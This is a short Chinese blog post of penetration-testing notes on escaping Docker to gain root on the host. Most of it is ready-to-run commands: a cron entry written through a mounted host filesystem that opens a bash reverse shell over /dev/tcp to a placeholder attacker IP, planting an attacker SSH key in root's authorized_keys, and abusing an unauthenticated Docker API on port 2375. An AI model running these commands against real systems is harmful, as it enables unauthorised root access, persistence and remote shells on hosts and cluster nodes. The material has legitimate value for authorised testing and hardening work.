【实战】Docker漏洞的记录

1.1.   Docker判断

cat /proc/1/cgroup

 

ls -alh /.dockerenv

1.2.  Docker反弹shell

条件:

获取到宿主机普通用户权限

当前用户已加入docker用户组

a)  写入计划任务获取root权限

进入容器:

docker run -it -v /:/mnt alpine

echo '* * * * * /bin/bash -i > /dev/tcp/xx.xx.xx.xx/8088 0>&1 2>&1' >> /mnt/var/spool/cron/root

注:此语句适用于centos系统

系统任务调度文件:/etc/crontab

用户 XXX 调度文件:

ubuntu下路径

/var/spool/cron/crontabs/xxx

Alpine下路径

/etc/cron.d/xxx

debian下的路径(xxx可以是任意东西)

/etc/cron.d/xxx

或者

/var/spool/cron/crontabs/xxx

但是写这个路径的时候,文件内不能加用户名

攻击机监听:

a)  写入ssh密钥获取root权限

攻击机

ssh-keygen -b 4096 -t rsa

三次回车即可生成

Docker容器里:

挂载宿主机根目录进入容器

docker run -it -v /:/mnt alpine

echo '生成的.pub文件的内容' >/mnt/root/.ssh/authorized_keys

攻击机连接:

ssh -i /home/pentest/.ssh/id_rsa root@xx.xx.xx.xx

1.3.   Docker配置不当

Docker api未授权访问

docker -H tcp://10.1.1.71:2375 images

 

挂载目录写入计划任务获取root权限,如下图:

远程挂载命令:docker -H tcp://10.1.1.71:2375 run -it -v /:/mnt alpine

 攻击机监听:

 熟悉的node,成功获取k8s集群的一台节点服务器权限。

posted @ 2021-09-09 14:22  Carrypan  阅读(363)  评论(0编辑  收藏  举报